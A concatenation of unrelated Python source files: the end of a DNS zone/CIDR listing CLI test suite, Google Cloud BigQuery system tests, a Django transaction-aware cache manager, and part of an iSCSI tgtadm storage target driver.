in lines)
output.close()
output = os.popen('python %s zone -z forward_zone --no-header '
'-v test_view3 -s %s -u %s -p %s --config-file %s' % (
EXEC, self.server_name, USERNAME,
PASSWORD, USER_CONFIG))
self.assertEqual( output.read(),
'192.168.1.11 Forward host2.university.edu forward_zone test_view3\n'
'192.168.1.17 Forward host5.university.edu forward_zone test_view3\n\n')
output.close()
output = os.popen('python %s zone -z forward_zone --no-header '
'-v test_view -s %s -u %s -p %s --config-file %s' % (
EXEC, self.server_name, USERNAME,
PASSWORD, USER_CONFIG))
self.assertEqual(output.read(),
'192.168.0.1 Forward host1.university.edu forward_zone test_view\n'
'4321:0000:0001:0002:0003:0004:0567:89ab Forward host2.university.edu forward_zone test_view\n'
'192.168.1.5 Forward host3.university.edu forward_zone test_view\n'
'192.168.1.10 Forward host4.university.edu forward_zone test_view\n'
'192.168.1.8 Forward host6.university.edu forward_zone test_view\n\n')
output.close()
output = os.popen('python %s zone -z forward_zone --no-header '
'--cidr-block 192.168.56.0/29 -s %s -u %s -p %s '
'--config-file %s' % (EXEC, self.server_name,
USERNAME, PASSWORD, USER_CONFIG))
self.assertEqual(output.read(),
'CLIENT ERROR: The --cidr-block flag cannot be used with '
'the zone command.\n')
output.close()
output = os.popen('python %s -z forward_zone --no-header '
'--cidr-block 192.168.56.0/29 -s %s -u %s -p %s '
'--config-file %s' % (EXEC, self.server_name,
USERNAME, PASSWORD, USER_CONFIG))
self.assertEqual(output.read(),
'CLIENT ERROR: A command must be specified.\n')
output.close()
def testListCIDR(self):
self.core_instance.MakeReverseRangeZoneAssignment(u'reverse_zone',
u'192.168.1.4/30')
output = os.popen('python %s cidr --cidr-block 192.168.1.4/30 --no-header '
'-v test_view -s %s -u %s -p %s --config-file %s' % (
EXEC, self.server_name, USERNAME,
PASSWORD, USER_CONFIG))
lines = output.read()
self.assertEquals(len(lines), 321 )
self.assertEqual(lines,
'192.168.1.4 -- -- -- test_view\n'
'192.168.1.5 Reverse host3.university.edu reverse_zone test_view\n'
'192.168.1.5 Forward host3.university.edu forward_zone test_view\n'
'192.168.1.6 -- -- -- test_view\n'
'192.168.1.7 -- -- -- test_view\n\n')
output.close()
output = os.popen('python %s cidr --cidr-block 192.168.1.4/30 '
'-s %s -u %s -p %s --config-file %s' % (
EXEC, self.server_name, USERNAME,
PASSWORD, USER_CONFIG))
lines = output.read()
self.assertEqual(len(lines), 653)
self.assertTrue(
'View: test_view2\n'
in lines)
self.assertTrue(
'192.168.1.4 Reverse host2.university.edu reverse_zone test_view2\n'
in lines)
self.assertTrue(
'192.168.1.5 -- -- -- test_view2\n'
in lines)
self.assertTrue(
'192.168.1.6 -- -- -- test_view2\n'
in lines)
self.assertTrue(
'192.168.1.7 Reverse host5.university.edu reverse_zone test_view2\n'
in lines)
self.assertTrue(
'View: test_view\n'
in lines)
self.assertTrue(
'192.168.1.4 -- -- -- test_view\n'
in lines)
self.assertTrue(
'192.168.1.5 Reverse host3.university.edu reverse_zone test_view\n'
in lines)
self.assertTrue(
'192.168.1.5 Forward host3.university.edu forward_zone test_view\n'
in lines)
self.assertTrue(
'192.168.1.6 -- -- -- test_view\n'
in lines)
self.assertTrue(
'192.168.1.7 -- -- -- test_view\n'
in lines)
output.close()
output = os.popen('python %s cidr --cidr-block 192.168.1.4/30 --no-header '
'-v test_view -s %s -u %s -p %s --config-file %s' % (
EXEC, self.server_name, USERNAME,
PASSWORD, USER_CONFIG))
self.assertEqual(output.read(),
'192.168.1.4 -- -- -- test_view\n'
'192.168.1.5 Reverse host3.university.edu reverse_zone test_view\n'
'192.168.1.5 Forward host3.university.edu forward_zone test_view\n'
'192.168.1.6 -- -- -- test_view\n'
'192.168.1.7 -- -- -- test_view\n\n')
output.close()
output = os.popen('python %s cidr --cidr-block 10.0.0.4/30 --no-header '
'-s %s -u %s -p %s --config-file %s' % (
EXEC, self.server_name, USERNAME,
PASSWORD, USER_CONFIG))
self.assertEqual(output.read(),
'10.0.0.4 -- -- -- --\n'
'10.0.0.5 -- -- -- --\n'
'10.0.0.6 -- -- -- --\n'
'10.0.0.7 -- -- -- --\n\n')
output.close()
output = os.popen('python %s cidr --cidr-block 192.168.1.4/32 --no-header '
'-s %s -u %s -p %s --config-file %s' % (
EXEC, self.server_name, USERNAME,
PASSWORD, USER_CONFIG))
self.assertEqual(output.read(),
'192.168.1.4 Reverse host2.university.edu reverse_zone test_view2\n\n')
output.close()
output = os.popen('python %s cidr --cidr-block 192.168.1.4/30 --no-header '
'-z forward_zone -s %s -u %s -p %s --config-file %s '
'-v test_view' % (EXEC, self.server_name, USERNAME,
PASSWORD, USER_CONFIG))
self.assertEqual(output.read(),
'192.168.1.4 -- -- -- test_view\n'
'192.168.1.5 Forward host3.university.edu forward_zone test_view\n'
'192.168.1.6 -- -- -- test_view\n'
'192.168.1.7 -- -- -- test_view\n\n')
output.close()
output = os.popen('python %s cidr --cidr-block 192.168.1.4/30 --no-header '
'-z reverse_zone -s %s -u %s -p %s --config-file %s '
'-v test_view' % (EXEC, self.server_name, USERNAME,
PASSWORD, USER_CONFIG))
self.assertEqual(output.read(),
'192.168.1.4 -- -- -- test_view\n'
'192.168.1.5 Reverse host3.university.edu reverse_zone test_view\n'
'192.168.1.6 -- -- -- test_view\n'
'192.168.1.7 -- -- -- test_view\n\n')
output.close()
output = os.popen('python %s cidr -z forward_zone --no-header '
' -s %s -u %s -p %s --config-file %s' %
(EXEC, self.server_name, USERNAME, PASSWORD, USER_CONFIG))
self.assertEqual(output.read(),
'CLIENT ERROR: The --cidr-block flag is required.\n')
output.close()
if( __name__ == '__main__' ):
unittest.main()
| |
# Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import operator
import unittest
from google.cloud import bigquery
from google.cloud.exceptions import Forbidden
from retry import RetryErrors
from retry import RetryInstanceState
from retry import RetryResult
from system_test_utils import unique_resource_id
def _has_rows(result):
return len(result) > 0
def _make_dataset_name(prefix):
return '%s%s' % (prefix, unique_resource_id())
def _rate_limit_exceeded(forbidden):
"""Predicate: pass only exceptions with 'rateLimitExceeded' as reason."""
return any(error['reason'] == 'rateLimitExceeded'
for error in forbidden._errors)
# We need to wait to stay within the rate limits.
# The alternative outcome is a 403 Forbidden response from upstream, which
# they return instead of the more appropriate 429.
# See: https://cloud.google.com/bigquery/quota-policy
retry_403 = RetryErrors(Forbidden, error_predicate=_rate_limit_exceeded)
class Config(object):
"""Run-time configuration to be modified at set-up.
This is a mutable stand-in to allow test set-up to modify
global state.
"""
CLIENT = None
def setUpModule():
Config.CLIENT = bigquery.Client()
class TestBigQuery(unittest.TestCase):
def setUp(self):
self.to_delete = []
def tearDown(self):
from google.cloud.bigquery.dataset import Dataset
from google.cloud.storage import Bucket
from google.cloud.exceptions import BadRequest
from google.cloud.exceptions import Conflict
def _still_in_use(bad_request):
return any(error['reason'] == 'resourceInUse'
for error in bad_request._errors)
retry_in_use = RetryErrors(BadRequest, error_predicate=_still_in_use)
retry_409 = RetryErrors(Conflict)
for doomed in self.to_delete:
if isinstance(doomed, Bucket):
retry_409(doomed.delete)(force=True)
elif isinstance(doomed, Dataset):
retry_in_use(doomed.delete)()
else:
doomed.delete()
def test_create_dataset(self):
DATASET_NAME = _make_dataset_name('create_dataset')
dataset = Config.CLIENT.dataset(DATASET_NAME)
self.assertFalse(dataset.exists())
retry_403(dataset.create)()
self.to_delete.append(dataset)
self.assertTrue(dataset.exists())
self.assertEqual(dataset.name, DATASET_NAME)
def test_reload_dataset(self):
DATASET_NAME = _make_dataset_name('reload_dataset')
dataset = Config.CLIENT.dataset(DATASET_NAME)
dataset.friendly_name = 'Friendly'
dataset.description = 'Description'
retry_403(dataset.create)()
self.to_delete.append(dataset)
other = Config.CLIENT.dataset(DATASET_NAME)
other.reload()
self.assertEqual(other.friendly_name, 'Friendly')
self.assertEqual(other.description, 'Description')
def test_patch_dataset(self):
dataset = Config.CLIENT.dataset(_make_dataset_name('patch_dataset'))
self.assertFalse(dataset.exists())
retry_403(dataset.create)()
self.to_delete.append(dataset)
self.assertTrue(dataset.exists())
self.assertIsNone(dataset.friendly_name)
self.assertIsNone(dataset.description)
dataset.patch(friendly_name='Friendly', description='Description')
self.assertEqual(dataset.friendly_name, 'Friendly')
self.assertEqual(dataset.description, 'Description')
def test_update_dataset(self):
dataset = Config.CLIENT.dataset(_make_dataset_name('update_dataset'))
self.assertFalse(dataset.exists())
retry_403(dataset.create)()
self.to_delete.append(dataset)
self.assertTrue(dataset.exists())
after = [grant for grant in dataset.access_grants
if grant.entity_id != 'projectWriters']
dataset.access_grants = after
retry_403(dataset.update)()
self.assertEqual(len(dataset.access_grants), len(after))
for found, expected in zip(dataset.access_grants, after):
self.assertEqual(found.role, expected.role)
self.assertEqual(found.entity_type, expected.entity_type)
self.assertEqual(found.entity_id, expected.entity_id)
def test_list_datasets(self):
datasets_to_create = [
'new' + unique_resource_id(),
'newer' + unique_resource_id(),
'newest' + unique_resource_id(),
]
for dataset_name in datasets_to_create:
dataset = Config.CLIENT.dataset(dataset_name)
retry_403(dataset.create)()
self.to_delete.append(dataset)
# Retrieve the datasets.
iterator = Config.CLIENT.list_datasets()
all_datasets = list(iterator)
self.assertIsNone(iterator.next_page_token)
created = [dataset for dataset in all_datasets
if dataset.name in datasets_to_create and
dataset.project == Config.CLIENT.project]
self.assertEqual(len(created), len(datasets_to_create))
def test_create_table(self):
dataset = Config.CLIENT.dataset(_make_dataset_name('create_table'))
self.assertFalse(dataset.exists())
retry_403(dataset.create)()
self.to_delete.append(dataset)
TABLE_NAME = 'test_table'
full_name = bigquery.SchemaField('full_name', 'STRING',
mode='REQUIRED')
age = bigquery.SchemaField('age', 'INTEGER', mode='REQUIRED')
table = dataset.table(TABLE_NAME, schema=[full_name, age])
self.assertFalse(table.exists())
table.create()
self.to_delete.insert(0, table)
self.assertTrue(table.exists())
self.assertEqual(table.name, TABLE_NAME)
def test_list_tables(self):
DATASET_NAME = _make_dataset_name('list_tables')
dataset = Config.CLIENT.dataset(DATASET_NAME)
self.assertFalse(dataset.exists())
retry_403(dataset.create)()
self.to_delete.append(dataset)
# Retrieve tables before any are created for the dataset.
iterator = dataset.list_tables()
all_tables = list(iterator)
self.assertEqual(all_tables, [])
self.assertIsNone(iterator.next_page_token)
# Insert some tables to be listed.
tables_to_create = [
'new' + unique_resource_id(),
'newer' + unique_resource_id(),
'newest' + unique_resource_id(),
]
full_name = bigquery.SchemaField('full_name', 'STRING',
mode='REQUIRED')
age = bigquery.SchemaField('age', 'INTEGER', mode='REQUIRED')
for table_name in tables_to_create:
table = dataset.table(table_name, schema=[full_name, age])
table.create()
self.to_delete.insert(0, table)
# Retrieve the tables.
iterator = dataset.list_tables()
all_tables = list(iterator)
self.assertIsNone(iterator.next_page_token)
created = [table for table in all_tables
if (table.name in tables_to_create and
table.dataset_name == DATASET_NAME)]
self.assertEqual(len(created), len(tables_to_create))
def test_patch_table(self):
dataset = Config.CLIENT.dataset(_make_dataset_name('patch_table'))
self.assertFalse(dataset.exists())
retry_403(dataset.create)()
self.to_delete.append(dataset)
TABLE_NAME = 'test_table'
full_name = bigquery.SchemaField('full_name', 'STRING',
mode='REQUIRED')
age = bigquery.SchemaField('age', 'INTEGER', mode='REQUIRED')
table = dataset.table(TABLE_NAME, schema=[full_name, age])
self.assertFalse(table.exists())
table.create()
self.to_delete.insert(0, table)
self.assertTrue(table.exists())
self.assertIsNone(table.friendly_name)
self.assertIsNone(table.description)
table.patch(friendly_name='Friendly', description='Description')
self.assertEqual(table.friendly_name, 'Friendly')
self.assertEqual(table.description, 'Description')
def test_update_table(self):
dataset = Config.CLIENT.dataset(_make_dataset_name('update_table'))
self.assertFalse(dataset.exists())
retry_403(dataset.create)()
self.to_delete.append(dataset)
TABLE_NAME = 'test_table'
full_name = bigquery.SchemaField('full_name', 'STRING',
mode='REQUIRED')
age = bigquery.SchemaField('age', 'INTEGER', mode='REQUIRED')
table = dataset.table(TABLE_NAME, schema=[full_name, age])
self.assertFalse(table.exists())
table.create()
self.to_delete.insert(0, table)
self.assertTrue(table.exists())
voter = bigquery.SchemaField('voter', 'BOOLEAN', mode='NULLABLE')
schema = table.schema
schema.append(voter)
table.schema = schema
table.update()
self.assertEqual(len(table.schema), len(schema))
for found, expected in zip(table.schema, schema):
self.assertEqual(found.name, expected.name)
self.assertEqual(found.field_type, expected.field_type)
self.assertEqual(found.mode, expected.mode)
@staticmethod
def _fetch_single_page(table):
import six
iterator = table.fetch_data()
page = six.next(iterator.pages)
return list(page)
def test_insert_data_then_dump_table(self):
import datetime
from google.cloud._helpers import UTC
NOW_SECONDS = 1448911495.484366
NOW = datetime.datetime.utcfromtimestamp(
NOW_SECONDS).replace(tzinfo=UTC)
ROWS = [
('Phred Phlyntstone', 32, NOW),
('Bharney Rhubble', 33, NOW + datetime.timedelta(seconds=10)),
('Wylma Phlyntstone', 29, NOW + datetime.timedelta(seconds=20)),
('Bhettye Rhubble', 27, None),
]
ROW_IDS = range(len(ROWS))
dataset = Config.CLIENT.dataset(
_make_dataset_name('insert_data_then_dump'))
self.assertFalse(dataset.exists())
retry_403(dataset.create)()
self.to_delete.append(dataset)
TABLE_NAME = 'test_table'
full_name = bigquery.SchemaField('full_name', 'STRING',
mode='REQUIRED')
age = bigquery.SchemaField('age', 'INTEGER', mode='REQUIRED')
now = bigquery.SchemaField('now', 'TIMESTAMP')
table = dataset.table(TABLE_NAME, schema=[full_name, age, now])
self.assertFalse(table.exists())
table.create()
self.to_delete.insert(0, table)
self.assertTrue(table.exists())
errors = table.insert_data(ROWS, ROW_IDS)
self.assertEqual(len(errors), 0)
rows = ()
# Allow for "warm up" before rows visible. See:
# https://cloud.google.com/bigquery/streaming-data-into-bigquery#dataavailability
# 8 tries -> 1 + 2 + 4 + 8 + 16 + 32 + 64 = 127 seconds
retry = RetryResult(_has_rows, max_tries=8)
rows = retry(self._fetch_single_page)(table)
by_age = operator.itemgetter(1)
self.assertEqual(sorted(rows, key=by_age),
sorted(ROWS, key=by_age))
def test_load_table_from_local_file_then_dump_table(self):
import csv
import tempfile
ROWS = [
('Phred Phlyntstone', 32),
('Bharney Rhubble', 33),
('Wylma Phlyntstone', 29),
('Bhettye Rhubble', 27),
]
TABLE_NAME = 'test_table'
dataset = Config.CLIENT.dataset(
_make_dataset_name('load_local_then_dump'))
retry_403(dataset.create)()
self.to_delete.append(dataset)
full_name = bigquery.SchemaField('full_name', 'STRING',
mode='REQUIRED')
age = bigquery.SchemaField('age', 'INTEGER', mode='REQUIRED')
table = dataset.table(TABLE_NAME, schema=[full_name, age])
table.create()
self.to_delete.insert(0, table)
with tempfile.NamedTemporaryFile(mode='w+') as csv_file:
writer = csv.writer(csv_file)
writer.writerow(('Full Name', 'Age'))
writer.writerows(ROWS)
csv_file.flush()
with open(csv_file.name, 'rb') as csv_read:
job = table.upload_from_file(
csv_read,
source_format='CSV',
skip_leading_rows=1,
create_disposition='CREATE_NEVER',
write_disposition='WRITE_EMPTY',
)
def _job_done(instance):
return instance.state.lower() == 'done'
# Retry until done.
retry = RetryInstanceState(_job_done, max_tries=8)
retry(job.reload)()
self.assertEqual(job.output_rows, len(ROWS))
rows = self._fetch_single_page(table)
by_age = operator.itemgetter(1)
self.assertEqual(sorted(rows, key=by_age),
sorted(ROWS, key=by_age))
def test_load_table_from_storage_then_dump_table(self):
import csv
import tempfile
from google.cloud.storage import Client as StorageClient
local_id = unique_resource_id()
BUCKET_NAME = 'bq_load_test' + local_id
BLOB_NAME = 'person_ages.csv'
GS_URL = 'gs://%s/%s' % (BUCKET_NAME, BLOB_NAME)
ROWS = [
('Phred Phlyntstone', 32),
('Bharney Rhubble', 33),
('Wylma Phlyntstone', 29),
('Bhettye Rhubble', 27),
]
TABLE_NAME = 'test_table'
s_client = StorageClient()
# In the **very** rare case the bucket name is reserved, this
# fails with a ConnectionError.
bucket = s_client.create_bucket(BUCKET_NAME)
self.to_delete.append(bucket)
blob = bucket.blob(BLOB_NAME)
with tempfile.TemporaryFile(mode='w+') as csv_file:
writer = csv.writer(csv_file)
writer.writerow(('Full Name', 'Age'))
writer.writerows(ROWS)
blob.upload_from_file(
csv_file, rewind=True, content_type='text/csv')
self.to_delete.insert(0, blob)
dataset = Config.CLIENT.dataset(
_make_dataset_name('load_gcs_then_dump'))
retry_403(dataset.create)()
self.to_delete.append(dataset)
full_name = bigquery.SchemaField('full_name', 'STRING',
mode='REQUIRED')
age = bigquery.SchemaField('age', 'INTEGER', mode='REQUIRED')
table = dataset.table(TABLE_NAME, schema=[full_name, age])
table.create()
self.to_delete.insert(0, table)
job = Config.CLIENT.load_table_from_storage(
'bq_load_storage_test_' + local_id, table, GS_URL)
job.create_disposition = 'CREATE_NEVER'
job.skip_leading_rows = 1
job.source_format = 'CSV'
job.write_disposition = 'WRITE_EMPTY'
job.begin()
def _job_done(instance):
return instance.state in ('DONE', 'done')
# Allow for 90 seconds of "warm up" before rows visible. See:
# https://cloud.google.com/bigquery/streaming-data-into-bigquery#dataavailability
# 8 tries -> 1 + 2 + 4 + 8 + 16 + 32 + 64 = 127 seconds
retry = RetryInstanceState(_job_done, max_tries=8)
retry(job.reload)()
rows = self._fetch_single_page(table)
by_age = operator.itemgetter(1)
self.assertEqual(sorted(rows, key=by_age),
sorted(ROWS, key=by_age))
def test_job_cancel(self):
DATASET_NAME = _make_dataset_name('job_cancel')
JOB_NAME = 'fetch_' + DATASET_NAME
TABLE_NAME = 'test_table'
QUERY = 'SELECT * FROM %s.%s' % (DATASET_NAME, TABLE_NAME)
dataset = Config.CLIENT.dataset(DATASET_NAME)
retry_403(dataset.create)()
self.to_delete.append(dataset)
full_name = bigquery.SchemaField('full_name', 'STRING',
mode='REQUIRED')
age = bigquery.SchemaField('age', 'INTEGER', mode='REQUIRED')
table = dataset.table(TABLE_NAME, schema=[full_name, age])
table.create()
self.to_delete.insert(0, table)
job = Config.CLIENT.run_async_query(JOB_NAME, QUERY)
job.begin()
job.cancel()
def _job_done(instance):
return instance.state in ('DONE', 'done')
retry = RetryInstanceState(_job_done, max_tries=8)
retry(job.reload)()
# The `cancel` API doesn't leave any reliable traces on
# the status of the job resource, so we can't really assert for
# them here. The best we can do is not that the API call didn't
# raise an error, and that the job completed (in the `retry()`
# above).
def test_sync_query_w_standard_sql_types(self):
import datetime
from google.cloud._helpers import UTC
naive = datetime.datetime(2016, 12, 5, 12, 41, 9)
stamp = "%s %s" % (naive.date().isoformat(), naive.time().isoformat())
zoned = naive.replace(tzinfo=UTC)
EXAMPLES = [
{
'sql': 'SELECT 1',
'expected': 1,
},
{
'sql': 'SELECT 1.3',
'expected': 1.3,
},
{
'sql': 'SELECT TRUE',
'expected': True,
},
{
'sql': 'SELECT "ABC"',
'expected': 'ABC',
},
{
'sql': 'SELECT CAST("foo" AS BYTES)',
'expected': b'foo',
},
{
'sql': 'SELECT TIMESTAMP "%s"' % (stamp,),
'expected': zoned,
},
{
'sql': 'SELECT DATETIME(TIMESTAMP "%s")' % (stamp,),
'expected': naive,
},
{
'sql': 'SELECT DATE(TIMESTAMP "%s")' % (stamp,),
'expected': naive.date(),
},
{
'sql': 'SELECT TIME(TIMESTAMP "%s")' % (stamp,),
'expected': naive.time(),
},
{
'sql': 'SELECT (1, 2)',
'expected': {'_field_1': 1, '_field_2': 2},
},
{
'sql': 'SELECT [1, 2, 3]',
'expected': [1, 2, 3],
},
{
'sql': 'SELECT ([1, 2], 3, [4, 5])',
'expected':
{'_field_1': [1, 2], '_field_2': 3, '_field_3': [4, 5]},
},
{
'sql': 'SELECT [(1, 2, 3), (4, 5, 6)]',
'expected': [
{'_field_1': 1, '_field_2': 2, '_field_3': 3},
{'_field_1': 4, '_field_2': 5, '_field_3': 6},
],
},
{
'sql': 'SELECT [([1, 2, 3], 4), ([5, 6], 7)]',
'expected': [
{u'_field_1': [1, 2, 3], u'_field_2': 4},
{u'_field_1': [5, 6], u'_field_2': 7},
],
},
{
'sql': 'SELECT ARRAY(SELECT STRUCT([1, 2]))',
'expected': [{u'_field_1': [1, 2]}],
},
]
for example in EXAMPLES:
query = Config.CLIENT.run_sync_query(example['sql'])
query.use_legacy_sql = False
query.run()
self.assertEqual(len(query.rows), 1)
self.assertEqual(len(query.rows[0]), 1)
self.assertEqual(query.rows[0][0], example['expected'])
def test_dump_table_w_public_data(self):
PUBLIC = 'bigquery-public-data'
DATASET_NAME = 'samples'
TABLE_NAME = 'natality'
dataset = Config.CLIENT.dataset(DATASET_NAME, project=PUBLIC)
table = dataset.table(TABLE_NAME)
self._fetch_single_page(table)
| |
import django
from django.db import transaction as django_transaction
from django.db import connection
try:
from django.db import DEFAULT_DB_ALIAS
except:
DEFUALT_DB_ALIAS = None
from johnny.decorators import wraps, available_attrs
class TransactionManager(object):
"""
TransactionManager is a wrapper around a cache_backend that is
transaction aware.
If we are in a transaction, it will return the locally cached version.
* On rollback, it will flush all local caches
* On commit, it will push them up to the real shared cache backend
(ex. memcached).
"""
_patched_var = False
def __init__(self, cache_backend, keygen):
from johnny import cache, settings
self.timeout = settings.MIDDLEWARE_SECONDS
self.prefix = settings.MIDDLEWARE_KEY_PREFIX
self.cache_backend = cache_backend
self.local = cache.local
self.keygen = keygen(self.prefix)
self._originals = {}
self._dirty_backup = {}
self.local['trans_sids'] = {}
def _get_sid(self, using=None):
if 'trans_sids' not in self.local:
self.local['trans_sids'] = {}
d = self.local['trans_sids']
if using is None:
using = DEFAULT_DB_ALIAS
if using not in d:
d[using] = []
return d[using]
def _clear_sid_stack(self, using=None):
if using is None:
using = DEFAULT_DB_ALIAS
if using in self.local.get('trans_sids', {}):
del self.local['trans_sids']
def is_managed(self, using=None):
if django.VERSION[1] < 2:
return django_transaction.is_managed()
return django_transaction.is_managed(using=using)
def get(self, key, default=None, using=None):
if self.is_managed(using) and self._patched_var:
val = self.local.get(key, None)
if val:
return val
if self._uses_savepoints():
val = self._get_from_savepoints(key, using)
if val:
return val
return self.cache_backend.get(key, default)
def _get_from_savepoints(self, key, using=None):
sids = self._get_sid(using)
cp = list(sids)
cp.reverse()
for sid in cp:
if key in self.local[sid]:
return self.local[sid][key]
def _trunc_using(self, using):
if using is None:
using = DEFAULT_DB_ALIAS
if len(using) > 100:
using = using[0:68] + self.keygen.gen_key(using[68:])
return using
def set(self, key, val, timeout=None, using=None):
"""
Set will be using the generational key, so if another thread
bumps this key, the localstore version will still be invalid.
If the key is bumped during a transaction it will be new
to the global cache on commit, so it will still be a bump.
"""
if timeout is None:
timeout = self.timeout
if self.is_managed(using=using) and self._patched_var:
self.local[key] = val
else:
self.cache_backend.set(key, val, timeout)
def _clear(self, using=None):
self.local.clear('%s_%s_*' %
(self.prefix, self._trunc_using(using)))
def _flush(self, commit=True, using=None):
"""
Flushes the internal cache, either to the memcache or rolls back
"""
if commit:
# XXX: multi-set?
if self._uses_savepoints():
self._commit_all_savepoints(using)
c = self.local.mget('%s_%s_*' %
(self.prefix, self._trunc_using(using)))
for key, value in c.iteritems():
self.cache_backend.set(key, value, self.timeout)
else:
if self._uses_savepoints():
self._rollback_all_savepoints(using)
self._clear(using)
self._clear_sid_stack(using)
def _patched(self, original, commit=True):
@wraps(original, assigned=available_attrs(original))
def newfun(using=None):
#1.2 version
original(using=using)
self._flush(commit=commit, using=using)
return newfun
def _uses_savepoints(self):
return connection.features.uses_savepoints
def _sid_key(self, sid, using=None):
if using is not None:
prefix = 'trans_savepoint_%s' % using
else:
prefix = 'trans_savepoint'
if sid is not None and sid.startswith(prefix):
return sid
return '%s_%s'%(prefix, sid)
def _create_savepoint(self, sid, using=None):
key = self._sid_key(sid, using)
#get all local dirty items
c = self.local.mget('%s_%s_*' %
(self.prefix, self._trunc_using(using)))
#store them to a dictionary in the localstore
if key not in self.local:
self.local[key] = {}
for k, v in c.iteritems():
self.local[key][k] = v
#clear the dirty
self._clear(using)
#append the key to the savepoint stack
sids = self._get_sid(using)
sids.append(key)
def _rollback_savepoint(self, sid, using=None):
sids = self._get_sid(using)
key = self._sid_key(sid, using)
stack = []
try:
popped = None
while popped != key:
popped = sids.pop()
stack.insert(0, popped)
#delete items from localstore
for i in stack:
del self.local[i]
#clear dirty
self._clear(using)
except IndexError:
#key not found, don't delete from localstore, restore sid stack
for i in stack:
sids.insert(0, i)
def _commit_savepoint(self, sid, using=None):
# commit is not a commit but is in reality just a clear back to that
# savepoint and adds the items back to the dirty transaction.
key = self._sid_key(sid, using)
sids = self._get_sid(using)
stack = []
try:
popped = None
while popped != key:
popped = sids.pop()
stack.insert(0, popped)
self._store_dirty(using)
for i in stack:
for k, v in self.local[i].iteritems():
self.local[k] = v
del self.local[i]
self._restore_dirty(using)
except IndexError:
for i in stack:
sids.insert(0, i)
def _commit_all_savepoints(self, using=None):
sids = self._get_sid(using)
if sids:
self._commit_savepoint(sids[0], using)
def _rollback_all_savepoints(self, using=None):
sids = self._get_sid(using)
if sids:
self._rollback_savepoint(sids[0], using)
def _store_dirty(self, using=None):
c = self.local.mget('%s_%s_*' %
(self.prefix, self._trunc_using(using)))
backup = 'trans_dirty_store_%s' % self._trunc_using(using)
self.local[backup] = {}
for k, v in c.iteritems():
self.local[backup][k] = v
self._clear(using)
def _restore_dirty(self, using=None):
backup = 'trans_dirty_store_%s' % self._trunc_using(using)
for k, v in self.local.get(backup, {}).iteritems():
self.local[k] = v
del self.local[backup]
def _savepoint(self, original):
@wraps(original, assigned=available_attrs(original))
def newfun(using=None):
if using != None:
sid = original(using=using)
else:
sid = original()
if self._uses_savepoints():
self._create_savepoint(sid, using)
return sid
return newfun
def _savepoint_rollback(self, original):
def newfun(sid, *args, **kwargs):
original(sid, *args, **kwargs)
if self._uses_savepoints():
if len(args) == 2:
using = args[1]
else:
using = kwargs.get('using', None)
self._rollback_savepoint(sid, using)
return newfun
def _savepoint_commit(self, original):
def newfun(sid, *args, **kwargs):
original(sid, *args, **kwargs)
if self._uses_savepoints():
if len(args) == 1:
using = args[0]
else:
using = kwargs.get('using', None)
self._commit_savepoint(sid, using)
return newfun
def _getreal(self, name):
return getattr(django_transaction, 'real_%s' % name,
getattr(django_transaction, name))
def patch(self):
"""
This function monkey patches commit and rollback
writes to the cache should not happen until commit (unless our state
isn't managed). It does not yet support savepoints.
"""
if not self._patched_var:
self._originals['rollback'] = self._getreal('rollback')
self._originals['commit'] = self._getreal('commit')
self._originals['savepoint'] = self._getreal('savepoint')
self._originals['savepoint_rollback'] = self._getreal('savepoint_rollback')
self._originals['savepoint_commit'] = self._getreal('savepoint_commit')
django_transaction.rollback = self._patched(django_transaction.rollback, False)
django_transaction.commit = self._patched(django_transaction.commit, True)
django_transaction.savepoint = self._savepoint(django_transaction.savepoint)
django_transaction.savepoint_rollback = self._savepoint_rollback(django_transaction.savepoint_rollback)
django_transaction.savepoint_commit = self._savepoint_commit(django_transaction.savepoint_commit)
self._patched_var = True
def unpatch(self):
for fun in self._originals:
setattr(django_transaction, fun, self._originals[fun])
self._patched_var = False
| |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import textwrap
import time
from oslo_concurrency import processutils as putils
from oslo_log import log as logging
from oslo_utils import fileutils
from jacket.storage import exception
from jacket.storage.i18n import _LI, _LW, _LE
from jacket.storage import utils
from jacket.storage.volume.targets import iscsi
LOG = logging.getLogger(__name__)
class TgtAdm(iscsi.ISCSITarget):
"""Target object for block storage devices.
Base class for target object, where target
is data transport mechanism (target) specific calls.
This includes things like create targets, attach, detach
etc.
"""
VOLUME_CONF = textwrap.dedent("""
<target %(name)s>
backing-store %(path)s
driver %(driver)s
%(chap_auth)s
%(target_flags)s
write-cache %(write_cache)s
</target>
""")
def __init__(self, *args, **kwargs):
super(TgtAdm, self).__init__(*args, **kwargs)
def _get_target(self, iqn):
(out, err) = utils.execute('tgt-admin', '--show', run_as_root=True)
lines = out.split('\n')
for line in lines:
if iqn in line:
parsed = line.split()
tid = parsed[1]
return tid[:-1]
return None
def _verify_backing_lun(self, iqn, tid):
backing_lun = True
capture = False
target_info = []
(out, err) = utils.execute('tgt-admin', '--show', run_as_root=True)
lines = out.split('\n')
for line in lines:
if iqn in line and "Target %s" % tid in line:
capture = True
if capture:
target_info.append(line)
if iqn not in line and 'Target ' in line:
capture = False
if ' LUN: 1' not in target_info:
backing_lun = False
return backing_lun
def _recreate_backing_lun(self, iqn, tid, name, path):
LOG.warning(_LW('Attempting recreate of backing lun...'))
# Since we think the most common case of this is a dev busy
# (create vol from snapshot) we're going to add a sleep here
# this will hopefully give things enough time to stabilize
# how long should we wait?? I have no idea, let's go big
# and error on the side of caution
time.sleep(10)
(out, err) = (None, None)
try:
(out, err) = utils.execute('tgtadm', '--lld', 'iscsi',
'--op', 'new', '--mode',
'logicalunit', '--tid',
tid, '--lun', '1', '-b',
path, run_as_root=True)
except putils.ProcessExecutionError as e:
LOG.error(_LE("Failed recovery attempt to create "
"iscsi backing lun for Volume "
"ID:%(vol_id)s: %(e)s"),
{'vol_id': name, 'e': e})
finally:
LOG.debug('StdOut from recreate backing lun: %s', out)
